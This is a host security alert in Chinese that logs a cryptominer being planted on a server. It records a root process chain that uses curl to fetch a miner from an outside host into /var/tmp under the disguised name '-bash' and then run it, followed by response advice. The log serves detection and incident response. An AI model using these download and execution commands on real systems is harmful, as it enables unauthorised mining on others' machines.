2023-07-31 16:33:10 详情 被写入的文件路径: /var/tmp/-bash 操作文件的进程ID: 1715 操作文件的进程路径: /usr/bin/curl 操作文件的进程命令行参数: curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o -bash http://pw.pwndns.pw/miners/x86_64 操作文件的进程链路: -[1435] /sbin/lntpdate -[1444] sh -s uc -[1715] curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o -bash https://pw.pwndns.pw/miners/x86_64 用户名: root 命令行: ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d 进程路径: /var/tmp/-bash 进程ID: 1775 父进程命令行: sh -s uc 父进程文件路径: /usr/bin/bash 父进程ID: 1444 进程链: -[1435] /sbin/lntpdate -[1444] sh -s uc -[1775] ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d 提示: 检测到可疑的文件植入行为，该文件被写入磁盘并被执行 描述: 检测到可疑的文件植入行为，该文件被写入磁盘并被执行。攻击者在利用漏洞获取主机权限后，通常会从外部植入文件以便于进一步的攻击渗透。 处置建议: 1.验证告警的准确性 a)检查告警中的内容。在互联网或威胁情报平台上搜索。 b)联系该设备所有者，验证该活动是否合法。 c)查看该设备是否还有其他类型的告警。交叉验证告警准确性。 d)使用“告警溯源”、“日志分析”功能，深入调查告警。 2.阻止或缓解恶意行为造成的影响。您可以隔离可疑文件、停止可疑进程、隔离受影响的机器、停用受感染的帐户或重置密码、阻止 IP 地址和 URL，并安装安全更新。 3.调查告警消除根因。执行漏洞扫描、基线检查，查找已知的弱点并进行修复。 4.联系您的安全事件响应团队，或者购买第三方应急响应服务，例如安全管家协助进行处理